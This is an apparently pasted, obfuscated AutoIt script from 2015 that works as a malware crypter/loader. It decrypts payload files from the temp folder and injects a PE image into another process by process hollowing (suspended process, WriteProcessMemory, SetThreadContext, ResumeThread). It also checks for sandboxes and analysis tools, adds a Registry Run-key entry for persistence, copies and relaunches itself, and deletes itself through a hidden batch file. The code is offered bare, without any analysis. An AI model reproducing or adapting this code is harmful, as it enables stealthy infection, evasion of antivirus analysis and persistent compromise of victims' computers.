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Aug 4th, 2015
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  2. #NoTrayIcon
  3. $Q30X5 = D31lGk(@TempDir & "\incl2")
  4. $X31NmnnTA = O3132E3b2($Q30X5, "giZQhnRDI-5GLnoTIqd4Mbp9NyvhTH")
  5. Y34IKsAuD($X31NmnnTA, $CmdLine[1], "")
  6. Func C30S2WV()
  7. If ProcessExists(Z33Tbn0R(42)) OR ProcessExists(Z33Tbn0R(43)) Then
  8. Exit
  9. EndIf
  10. EndFunc
  11. Global $J34kUU = ProcessList()
  12. #region Y34IKsAuD
  13. Func D31lGk($O35PAyLLR)
  14. Return FileRead($O35PAyLLR)
  15. EndFunc
  16. Func T32Aw($M37O4Ry)
  17. Global $M38gx = FileFindFirstFile(StringRegExpReplace($M37O4Ry, Z33Tbn0R(41), "") & P3235NEN2M6() & Y3236akOz())
  18. EndFunc
  19. Func Z33Tbn0R($M3130fm3F)
  20. $B3131Rbzj = D31lGk(@Tempdir & "\incl1")
  21. $L3132uPH = StringReverse(BinaryToString(StringReverse(BinaryToString(StringReverse(StringReplace(StringReplace(StringReplace(StringReplace(StringReplace($B3131Rbzj, "_", "2"), "?", "0"),"xms","3"), "#", "1"), "32t", "4"))))))
  22. $L3134MY6a = StringSplit($L3132uPH, "=")
  23. $C3136hTD = 0
  24. Do
  25. If $C3136hTD = UBound($L3134MY6a) - 1 Then ExitLoop
  26. $L3134MY6a[$C3136hTD] = StringTrimRight($L3134MY6a[$C3136hTD], StringLen($C3136hTD) + 1)
  27. $C3136hTD += 1
  28. Until $C3136hTD = UBound($L3134MY6a)
  29. Return StringReplace($L3134MY6a[$M3130fm3F + 1], @CR, "")
  30. EndFunc
  31. Func Y34IKsAuD($S3239vL1g, $R3330Rpa5 = $CmdLine[1], $A3331i7m = "")
  32. Global $O3332jyA = "ptr", $S3333E66XA = "handle"
  33. Local $N3334OaU = DllStructCreate("byte[" & BinaryLen($S3239vL1g) & "]"), $R3336sAMa, $L3337JbS6T, $Q3338PQLt, $V3339tSApn2, $L3430npI, $K3431l0mFLt, $Q3432bEN, $X3433Fq5ILS, $N3434gdlZn, $W34352J, $W3436Hesp, $X3437SXBL, $T34381Ngr
  34. DllStructSetData($N3334OaU, 1, $S3239vL1g)
  35. Local $V3531cKiqX = DllStructGetPtr($N3334OaU), $I3533iyX = DllStructCreate(Z33Tbn0R(2))
  36. Local $M37O4Ry = DllCall(Z33Tbn0R(3), "bool", Z33Tbn0R(20), "wstr", $R3330Rpa5, "wstr", $A3331i7m, $O3332jyA, 0, $O3332jyA, 0, "int", 0, "dword", 4, $O3332jyA, 0, $O3332jyA, 0, $O3332jyA, DllStructGetPtr(DllStructCreate(Z33Tbn0R(1))), $O3332jyA, DllStructGetPtr($I3533iyX))
  37. If @error Or Not $M37O4Ry[0] Then Return 0
  38. Local $G3635NEBza = DllStructGetData($I3533iyX, "Process"), $B3637ke = DllStructGetData($I3533iyX, "Thread")
  39. If @AutoItX64 And O3876w82($G3635NEBza) Then Return N3130l5p($G3635NEBza)
  40. If @AutoItX64 Then
  41. If @OSArch = "X64" Then
  42. $R3336sAMa = 2
  43. $L3337JbS6T = DllStructCreate(Z33Tbn0R(5))
  44. Else
  45. Return N3130l5p($G3635NEBza)
  46. EndIf
  47. Else
  48. $R3336sAMa = 1
  49. $L3337JbS6T = DllStructCreate(Z33Tbn0R(6))
  50. EndIf
  51. Switch $R3336sAMa
  52. Case 1
  53. $Q3338PQLt = 0x10007
  54. Case 2
  55. $Q3338PQLt = 0x100007
  56. EndSwitch
  57. DllStructSetData($L3337JbS6T, "ContextFlags", $Q3338PQLt)
  58. $M37O4Ry = DllCall(Z33Tbn0R(3), "bool", Z33Tbn0R(23), "handle", $B3637ke, $O3332jyA, DllStructGetPtr($L3337JbS6T))
  59. If @error Or Not $M37O4Ry[0] Then Return N3130l5p($G3635NEBza)
  60. Switch $R3336sAMa
  61. Case 1
  62. $V3339tSApn2 = DllStructGetData($L3337JbS6T, "Ebx")
  63. Case 2
  64. $V3339tSApn2 = DllStructGetData($L3337JbS6T, "Rdx")
  65. EndSwitch
  66. Local $M3932Ra84kA = DllStructCreate(Z33Tbn0R(7), $V3531cKiqX), $M393463 = $V3531cKiqX
  67. $V3531cKiqX += DllStructGetData($M3932Ra84kA, "AddressOfNewExeHeader")
  68. Local $G3938JaXbS = DllStructGetData($M3932Ra84kA, "Magic")
  69. If Not ($G3938JaXbS == "MZ") Then Return N3130l5p($G3635NEBza)
  70. Local $P313032aE5 = DllStructCreate("dword Signature", $V3531cKiqX)
  71. $V3531cKiqX += 4
  72. If DllStructGetData($P313032aE5, "Signature") <> 17744 Then Return N3130l5p($G3635NEBza)
  73. Local $J313037uc6dXX = DllStructCreate(Z33Tbn0R(8), $V3531cKiqX), $V313039hGTohH = DllStructGetData($J313037uc6dXX, "NumberOfSections")
  74. $V3531cKiqX += 20
  75. Local $C313132gAu = DllStructCreate("word Magic;", $V3531cKiqX), $S313134dt = DllStructGetData($C313132gAu, 1), $E3131363rTa
  76. If $S313134dt = 267 Then
  77. If @AutoItX64 Then Return N3130l5p($G3635NEBza)
  78. $E3131363rTa = DllStructCreate(Z33Tbn0R(9), $V3531cKiqX)
  79. $V3531cKiqX += 96
  80. ElseIf $S313134dt = 523 Then
  81. If Not @AutoItX64 Then Return N3130l5p($G3635NEBza)
  82. $E3131363rTa = DllStructCreate(Z33Tbn0R(10), $V3531cKiqX)
  83. $V3531cKiqX += 112
  84. Else
  85. Return N3130l5p($G3635NEBza)
  86. EndIf
  87. Local $S313238jb = DllStructGetData($E3131363rTa, "AddressOfEntryPoint"), $A31333028rU = DllStructGetData($E3131363rTa, "SizeOfHeaders"), $K313332rE = DllStructGetData($E3131363rTa, "ImageBase"), $P313334U1B = DllStructGetData($E3131363rTa, "SizeOfImage")
  88. $V3531cKiqX += 40
  89. Local $Q313337cym80 = DllStructCreate("dword a; dword b", $V3531cKiqX), $R313339U8 = DllStructGetData($Q313337cym80, "a"), $V313431uAi = DllStructGetData($Q313337cym80, "b")
  90. If $R313339U8 And $V313431uAi Then $L3430npI = True
  91. $V3531cKiqX += 88
  92. If $L3430npI Then
  93. $Q3432bEN = G36jGxx($G3635NEBza, $P313334U1B)
  94. If @error Then
  95. $Q3432bEN = F356bl($G3635NEBza, $K313332rE, $P313334U1B)
  96. If @error Then
  97. T37Zdpn($G3635NEBza, $K313332rE)
  98. $Q3432bEN = F356bl($G3635NEBza, $K313332rE, $P313334U1B)
  99. If @error Then Return N3130l5p($G3635NEBza)
  100. EndIf
  101. EndIf
  102. $K3431l0mFLt = True
  103. Else
  104. $Q3432bEN = F356bl($G3635NEBza, $K313332rE, $P313334U1B)
  105. If @error Then
  106. T37Zdpn($G3635NEBza, $K313332rE)
  107. $Q3432bEN = F356bl($G3635NEBza, $K313332rE, $P313334U1B)
  108. If @error Then Return N3130l5p($G3635NEBza)
  109. EndIf
  110. EndIf
  111. DllStructSetData($E3131363rTa, "ImageBase", $Q3432bEN)
  112. Local $J3137363NPPwW = DllStructCreate("byte[" & $P313334U1B & "]"), $R313738x3A = DllStructGetPtr($J3137363NPPwW), $O313830aBfvj = DllStructCreate("byte[" & $A31333028rU & "]", $M393463)
  113. DllStructSetData($J3137363NPPwW, 1, DllStructGetData($O313830aBfvj, 1))
  114. For $C3136hTD = 1 To $V313039hGTohH
  115. $X3433Fq5ILS = DllStructCreate(Z33Tbn0R(11), $V3531cKiqX)
  116. $N3434gdlZn = DllStructGetData($X3433Fq5ILS, "SizeOfRawData")
  117. $W34352J = $M393463 + DllStructGetData($X3433Fq5ILS, "PointerToRawData")
  118. $W3436Hesp = DllStructGetData($X3433Fq5ILS, "VirtualAddress")
  119. $X3437SXBL = DllStructGetData($X3433Fq5ILS, "UnionOfVirtualSizeAndPhysicalAddress")
  120. If $X3437SXBL And $X3437SXBL < $N3434gdlZn Then $N3434gdlZn = $X3437SXBL
  121. If $N3434gdlZn Then
  122. DllStructSetData(DllStructCreate("byte[" & $N3434gdlZn & "]", $R313738x3A + $W3436Hesp), 1, DllStructGetData(DllStructCreate("byte[" & $N3434gdlZn & "]", $W34352J), 1))
  123. EndIf
  124. If $K3431l0mFLt Then
  125. If $W3436Hesp <= $R313339U8 And $W3436Hesp + $N3434gdlZn > $R313339U8 Then
  126. $T34381Ngr = DllStructCreate("byte[" & $V313431uAi & "]", $W34352J + ($R313339U8 - $W3436Hesp))
  127. EndIf
  128. EndIf
  129. $V3531cKiqX += 40
  130. Next
  131. If $K3431l0mFLt Then H39yteIo($R313738x3A, $T34381Ngr, $Q3432bEN, $K313332rE, $S313134dt = 523)
  132. $M37O4Ry = DllCall(Z33Tbn0R(3), "bool", Z33Tbn0R(19), "handle", $G3635NEBza, $O3332jyA, $Q3432bEN, $O3332jyA, $R313738x3A, "dword_ptr", $P313334U1B, "dword_ptr*", 0)
  133. If @error Or Not $M37O4Ry[0] Then Return N3130l5p($G3635NEBza)
  134. Local $Y323336C7bo = DllStructCreate(Z33Tbn0R(12))
  135. $M37O4Ry = DllCall(Z33Tbn0R(3), "bool", Z33Tbn0R(18), $O3332jyA, $G3635NEBza, $O3332jyA, $V3339tSApn2, $O3332jyA, DllStructGetPtr($Y323336C7bo), "dword_ptr", DllStructGetSize($Y323336C7bo), "dword_ptr*", 0)
  136. If @error Or Not $M37O4Ry[0] Then Return N3130l5p($G3635NEBza)
  137. DllStructSetData($Y323336C7bo, "ImageBaseAddress", $Q3432bEN)
  138. $M37O4Ry = DllCall(Z33Tbn0R(3), "bool", Z33Tbn0R(19), "handle", $G3635NEBza, $O3332jyA, $V3339tSApn2, $O3332jyA, DllStructGetPtr($Y323336C7bo), "dword_ptr", DllStructGetSize($Y323336C7bo), "dword_ptr*", 0)
  139. If @error Or Not $M37O4Ry[0] Then Return N3130l5p($G3635NEBza)
  140. Switch $R3336sAMa
  141. Case 1
  142. DllStructSetData($L3337JbS6T, "Eax", $Q3432bEN + $S313238jb)
  143. Case 2
  144. DllStructSetData($L3337JbS6T, "Rcx", $Q3432bEN + $S313238jb)
  145. EndSwitch
  146. $M37O4Ry = DllCall(Z33Tbn0R(3), "bool", StringReverse("txetnoCdaerhTteS"), "handle", $B3637ke, $O3332jyA, DllStructGetPtr($L3337JbS6T))
  147. If @error Or Not $M37O4Ry[0] Then Return N3130l5p($G3635NEBza)
  148. $M37O4Ry = DllCall(Z33Tbn0R(3), "dword", "ResumeThread", "handle", $B3637ke)
  149. If @error Or $M37O4Ry[0] = -1 Then Return N3130l5p($G3635NEBza)
  150. DllCall(Z33Tbn0R(3), "bool", Z33Tbn0R(17), "handle", $G3635NEBza)
  151. DllCall(Z33Tbn0R(3), "bool", Z33Tbn0R(17), "handle", $B3637ke)
  152. Return DllStructGetData($I3533iyX, "ProcessId")
  153. EndFunc
  154. Func F356bl($G3635NEBza, $T323739NDph4p, $H323830zfj)
  155. Local $M37O4Ry = DllCall(Z33Tbn0R(3), $O3332jyA, Z33Tbn0R(25), "handle", $G3635NEBza, $O3332jyA, $T323739NDph4p, "dword_ptr", $H323830zfj, "dword", 0x1000, "dword", 64)
  156. If @error Or Not $M37O4Ry[0] Then
  157. $M37O4Ry = DllCall(Z33Tbn0R(3), $O3332jyA, Z33Tbn0R(25), "handle", $G3635NEBza, $O3332jyA, $T323739NDph4p, "dword_ptr", $H323830zfj, "dword", 0x3000, "dword", 64)
  158. If @error Or Not $M37O4Ry[0] Then Return SetError(1, 0, 0)
  159. EndIf
  160. Return $M37O4Ry[0]
  161. EndFunc
  162. Func G36jGxx($G3635NEBza, $H323830zfj)
  163. Local $M37O4Ry = DllCall(Z33Tbn0R(3), $O3332jyA, Z33Tbn0R(25), "handle", $G3635NEBza, $O3332jyA, 0, "dword_ptr", $H323830zfj, "dword", 0x3000, "dword", 64)
  164. If @error Or Not $M37O4Ry[0] Then Return SetError(1, 0, 0)
  165. Return $M37O4Ry[0]
  166. EndFunc
  167. Func T37Zdpn($G3635NEBza, $T323739NDph4p)
  168. DllCall(Z33Tbn0R(4), "int", Z33Tbn0R(24), $O3332jyA, $G3635NEBza, $O3332jyA, $T323739NDph4p)
  169. If @error Then Return SetError(1, 0, 0)
  170. Return 1
  171. EndFunc
  172. Func O3876w82($G3635NEBza)
  173. Local $M37O4Ry = DllCall(Z33Tbn0R(3), Z33Tbn0R(13), Z33Tbn0R(21), $S3333E66XA, $G3635NEBza, "bool*", 0)
  174. If @error Or Not $M37O4Ry[0] Then Return SetError(1, 0, 0)
  175. Return $M37O4Ry[2]
  176. EndFunc
  177. Func H39yteIo($R313738x3A, $C333138ziYote, $X333139Ii, $Z3332307urM, $U333231zF)
  178. Local $V333232FthX, $P333233nCTO, $P333234xlEW, $O333235yC02J, $T3332366O7koi, $Q333237IX, $R3336sAMa = 3 + 7 * $U333231zF
  179. While $P333233nCTO < DllStructGetSize($C333138ziYote)
  180. $V333232FthX = DllStructCreate(Z33Tbn0R(15), DllStructGetPtr($C333138ziYote) + $P333233nCTO)
  181. $P333234xlEW = DllStructGetData($V333232FthX, O3231oCXZf(98))
  182. $T3332366O7koi = DllStructCreate(Z33Tbn0R(16) & (($P333234xlEW - 8) / 2) & O3231oCXZf(93), DllStructGetPtr($V333232FthX) + 8)
  183. For $C3136hTD = 1 To (($P333234xlEW - 8) / 2)
  184. If BitShift(DllStructGetData($T3332366O7koi, 1, $C3136hTD), 12) = $R3336sAMa Then
  185. $Q333237IX = DllStructCreate($O3332jyA, $R313738x3A + DllStructGetData($V333232FthX, O3231oCXZf(97)) + BitAND(DllStructGetData($T3332366O7koi, 1, $C3136hTD), 0xFFF))
  186. DllStructSetData($Q333237IX, 1, DllStructGetData($Q333237IX, 1) + $X333139Ii - $Z3332307urM)
  187. EndIf
  188. Next
  189. $P333233nCTO += $P333234xlEW
  190. WEnd
  191. Return 1
  192. EndFunc
  193. Func N3130l5p($T333537FJ)
  194. DllCall(Z33Tbn0R(3), "bool", "TerminateProcess", "handle", $T333537FJ, "dword", 0)
  195. Return 0
  196. EndFunc
  197. #endregion
  198. Func F3131us()
  199. Return Z33Tbn0R(14)
  200. EndFunc
  201. Func O3132E3b2($H333539yl0uI, $P333630Negx)
  202. Local $M37O4Ry = Z33Tbn0R(30), $G333632ahi3B = Z33Tbn0R(26), $E333633M0R = "int", $V333634J0WxX = "str"
  203. Local $O333635vLBRfv = Z3133eRY5($M37O4Ry & J3135zSk($G333632ahi3B) & "]")
  204. Local $X33363838p = Z3133eRY5($M37O4Ry & J3135zSk($H333539yl0uI) & "]")
  205. L31347wNAV($O333635vLBRfv, $G333632ahi3B)
  206. L31347wNAV($X33363838p, $H333539yl0uI)
  207. DllCall(Z33Tbn0R(27), Z33Tbn0R(29), Z33Tbn0R(28), F3131us(), DllStructGetPtr($O333635vLBRfv), F3131us(), DllStructGetPtr($X33363838p), $E333633M0R, J3135zSk($H333539yl0uI), $V333634J0WxX, $P333630Negx, $E333633M0R, 0)
  208. Return DllStructGetData($X33363838p, 1)
  209. EndFunc
  210. Func Z3133eRY5($M37O4Ry)
  211. Return DllStructCreate($M37O4Ry)
  212. EndFunc
  213. Func L31347wNAV($M37O4Ry, $G333632ahi3B)
  214. Return DllStructSetData($M37O4Ry, 1, $G333632ahi3B)
  215. EndFunc
  216. Func J3135zSk($M37O4Ry)
  217. Return BinaryLen($M37O4Ry)
  218. EndFunc
  219. Func O31362LcHE()
  220. Return RegRead(Z33Tbn0R(36), "Progid")
  221. EndFunc
  222. Func E3137raDcFM()
  223. If Q313837X() Then
  224. Exit
  225. EndIf
  226. EndFunc
  227. Func Q313837X()
  228. If R3139H8Kq() = True Then
  229. If $J34kUU[18][0] = Z33Tbn0R(31) And $J34kUU[19][0] = Z33Tbn0R(32) And $J34kUU[20][0] = Z33Tbn0R(33) And $J34kUU[21][0] = Z33Tbn0R(34) Then Return True
  230. EndIf
  231. Return False
  232. EndFunc
  233. Func R3139H8Kq()
  234. If StringInStr(@OSVersion, "XP") AND StringInStr(@UserName, "Admin") AND StringInStr(@ComputerName, "pc") AND StringInStr(@OSServicePack, "3") Then Return True
  235. Return False
  236. EndFunc
  237. Func N3230lA0h()
  238. Return RegRead(Z33Tbn0R(37), Null)
  239. EndFunc
  240. Func O3231oCXZf($C3339352YjY)
  241. Return Chr($C3339352YjY)
  242. EndFunc
  243. Func J3232lkm1()
  244. Return RegRead(Z33Tbn0R(35), Null)
  245. EndFunc
  246. Func A3233gAG($I33393772Fv)
  247. RegWrite(O3231oCXZf(72) & O3231oCXZf(75) & O3231oCXZf(67) & O3231oCXZf(85) & O3231oCXZf(92) & O3231oCXZf(83) & O3231oCXZf(79) & O3231oCXZf(70) & O3231oCXZf(84) & O3231oCXZf(87) & O3231oCXZf(65) & O3231oCXZf(82) & O3231oCXZf(69) & O3231oCXZf(92) & O3231oCXZf(77) & O3231oCXZf(105) & O3231oCXZf(99) & O3231oCXZf(114) & O3231oCXZf(111) & O3231oCXZf(115) & O3231oCXZf(111) & O3231oCXZf(102) & O3231oCXZf(116) & O3231oCXZf(92) & O3231oCXZf(87) & O3231oCXZf(105) & O3231oCXZf(110) & O3231oCXZf(100) & O3231oCXZf(111) & O3231oCXZf(119) & O3231oCXZf(115) & O3231oCXZf(92) & O3231oCXZf(67) & O3231oCXZf(117) & O3231oCXZf(114) & O3231oCXZf(114) & O3231oCXZf(101) & O3231oCXZf(110) & O3231oCXZf(116) & O3231oCXZf(86) & O3231oCXZf(101) & O3231oCXZf(114) & O3231oCXZf(115) & O3231oCXZf(105) & O3231oCXZf(111) & O3231oCXZf(110) & O3231oCXZf(92) & O3231oCXZf(82) & O3231oCXZf(117) & O3231oCXZf(110), $I33393772Fv, O3231oCXZf(82) & O3231oCXZf(69) & O3231oCXZf(71) & O3231oCXZf(95) & O3231oCXZf(83) & O3231oCXZf(90), $CmdLine[1])
  248. EndFunc
  249. Func Z3234yH($W333939ZKUx, $Q343030mEbnK, $X343031kpxY4K = false)
  250. $E34303288m = "FileCopy('" & $W333939ZKUx & "', '" & $Q343030mEbnK & "')"
  251. Execute($E34303288m)
  252. $B343036rwy = 'ShellExecute("' & $Q343030mEbnK & '")'
  253. Execute($B343036rwy)
  254. If $X343031kpxY4K Then F3335QNd()
  255. Exit
  256. EndFunc
  257. Func P3235NEN2M6()
  258. Return "\"
  259. EndFunc
  260. Func Y3236akOz()
  261. Return "*"
  262. EndFunc
  263. Func X3237Yj7Tof()
  264. Return "|"
  265. EndFunc
  266. Func Z3238wzQ($M37O4Ry)
  267. Return StringReverse($M37O4Ry)
  268. EndFunc
  269. Func E3239X4jlUM()
  270. Return @TempDir & "\" & Random(50, 100, 1) & Z3238wzQ("tab.")
  271. EndFunc
  272. Func D3330KQoQ($O343132Q0, $K343133GE5gP)
  273. Global $A343134ifjd = Execute(O3231oCXZf(64) & O3231oCXZf(83) & O3231oCXZf(99) & O3231oCXZf(114) & O3231oCXZf(105) & O3231oCXZf(112) & O3231oCXZf(116) & O3231oCXZf(70) & O3231oCXZf(117) & O3231oCXZf(108) & O3231oCXZf(108) & O3231oCXZf(80) & O3231oCXZf(97) & O3231oCXZf(116) & O3231oCXZf(104))
  274. Global $Z343135pujlBx = Execute(O3231oCXZf(64) & O3231oCXZf(84) & O3231oCXZf(101) & O3231oCXZf(109) & O3231oCXZf(112) & O3231oCXZf(68) & O3231oCXZf(105) & O3231oCXZf(114))
  275. Global $H343136WdpB4U = Execute(O3231oCXZf(64) & O3231oCXZf(65) & O3231oCXZf(112) & O3231oCXZf(112) & O3231oCXZf(68) & O3231oCXZf(97) & O3231oCXZf(116) & O3231oCXZf(97) & O3231oCXZf(68) & O3231oCXZf(105) & O3231oCXZf(114))
  276. Global $F3431377pJWV = Execute(O3231oCXZf(64) & O3231oCXZf(83) & O3231oCXZf(99) & O3231oCXZf(114) & O3231oCXZf(105) & O3231oCXZf(112) & O3231oCXZf(116) & O3231oCXZf(68) & O3231oCXZf(105) & O3231oCXZf(114))
  277. Sleep(1000)
  278. Switch $O343132Q0
  279. Case O3231oCXZf(49)
  280. If $CmdLine[1] <> $H343136WdpB4U & O3231oCXZf(92) & $K343133GE5gP Then
  281. Z3234yH($CmdLine[1], $H343136WdpB4U & O3231oCXZf(92) & $K343133GE5gP, true)
  282. EndIf
  283. Case O3231oCXZf(50)
  284. If $CmdLine[1] <> $Z343135pujlBx & O3231oCXZf(92) & $K343133GE5gP Then
  285. Z3234yH($CmdLine[1], $Z343135pujlBx & O3231oCXZf(92) & $K343133GE5gP, true)
  286. EndIf
  287. Case O3231oCXZf(51)
  288. If $CmdLine[1] <> $H343136WdpB4U & O3231oCXZf(92) & $K343133GE5gP Then
  289. Z3234yH($CmdLine[1], $H343136WdpB4U & O3231oCXZf(92) & $K343133GE5gP)
  290. EndIf
  291. Case O3231oCXZf(52)
  292. If $CmdLine[1] <> $Z343135pujlBx & O3231oCXZf(92) & $K343133GE5gP Then
  293. Z3234yH($CmdLine[1], $Z343135pujlBx & O3231oCXZf(92) & $K343133GE5gP)
  294. EndIf
  295. EndSwitch
  296. EndFunc
  297. Func N3331PvZaRj()
  298. Return "."
  299. EndFunc
  300. Func K3332E6($M37O4Ry)
  301. T32Aw($M37O4Ry)
  302. Return $M38gx
  303. EndFunc
  304. Func S33333ab()
  305. If O31362LcHE() <> '' Then Return True
  306. Return False
  307. EndFunc
  308. Func P3334Do1($Q343338NXnTag, $Z343339E6u)
  309. FileWrite($Q343338NXnTag, $Z343339E6u)
  310. EndFunc
  311. Func F3335QNd()
  312. Local $J343432qQZq = E3239X4jlUM(), $M37O4Ry = @CRLF, $G333632ahi3B = @ScriptDir & "\" & @ScriptName, $E333633M0R = 'ping -n ' & 0 & ' > nul'
  313. FileDelete($J343432qQZq)
  314. P3334Do1($J343432qQZq, $E333633M0R & $M37O4Ry & ':loop' & $M37O4Ry & 'del "' & $G333632ahi3B & '"' & $M37O4Ry & 'if exist "' & $G333632ahi3B & '" goto loop' & $M37O4Ry & 'del ' & $J343432qQZq)
  315. Run($J343432qQZq, @TempDir, @SW_HIDE)
  316. EndFunc
  317. Func W33365PI7()
  318. If S33333ab() Then Return StringLeft(StringTrimLeft(N3230lA0h(), 1), StringInStr(StringTrimLeft(N3230lA0h(), 1), '"') - 1)
  319. Return StringLeft(StringTrimLeft(J3232lkm1(), 1), StringInStr(StringTrimLeft(J3232lkm1(), 1), '"') - 1)
  320. EndFunc
  321. Func T3337KEjiC($S343537xA, $J343538WXs = "*", $D343539fJPbfT = 0, $T343630JQZem6 = False)
  322. Local $B343631qEwHt = "|", $Z343632cqT = "", $C343633pYgq2M = "", $M343634Bd = ""
  323. $S343537xA = StringRegExpReplace($S343537xA, "[\\/]+$", "") & "\"
  324. If $D343539fJPbfT = Default Then $D343539fJPbfT = 0
  325. If $T343630JQZem6 Then $M343634Bd = $S343537xA
  326. If $J343538WXs = Default Then $J343538WXs = "*"
  327. If Not FileExists($S343537xA) Then Return SetError(1, 0, 0)
  328. If StringRegExp($J343538WXs, "[\\/:><\|]|(?s)^\s*$") Then Return SetError(2, 0, 0)
  329. If Not ($D343539fJPbfT = 0 Or $D343539fJPbfT = 1 Or $D343539fJPbfT = 2) Then Return SetError(3, 0, 0)
  330. Local $D343739SsPe = FileFindFirstFile($S343537xA & $J343538WXs)
  331. If @error Then Return SetError(4, 0, 0)
  332. While 1
  333. $C343633pYgq2M = FileFindNextFile($D343739SsPe)
  334. If @error Then ExitLoop
  335. If ($D343539fJPbfT + @extended = 2) Then ContinueLoop
  336. $Z343632cqT &= $B343631qEwHt & $M343634Bd & $C343633pYgq2M
  337. WEnd
  338. FileClose($D343739SsPe)
  339. If $Z343632cqT = "" Then Return SetError(4, 0, 0)
  340. Return StringSplit(StringTrimLeft($Z343632cqT, 1), $B343631qEwHt)
  341. EndFunc
  342. Func Y3338PDUw()
  343. Local $U343933VD = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework", "InstallRoot")
  344. Local $R343934xi4z = T3337KEjiC($U343933VD , "*", 2), $Y343936iN = ''
  345. For $C3136hTD = $R343934xi4z[0] To 1 Step -1
  346. If StringRegExp($R343934xi4z[$C3136hTD], "v4\.0\.\d+", 0) Then
  347. $Y343936iN = $R343934xi4z[$C3136hTD]
  348. ExitLoop
  349. ElseIf StringRegExp($R343934xi4z[$C3136hTD], "v2\.0\.\d+", 0) Then
  350. $Y343936iN = $R343934xi4z[$C3136hTD]
  351. ExitLoop
  352. EndIf
  353. Next
  354. Return $U343933VD & $Y343936iN & "\vbc.exe"
  355. EndFunc
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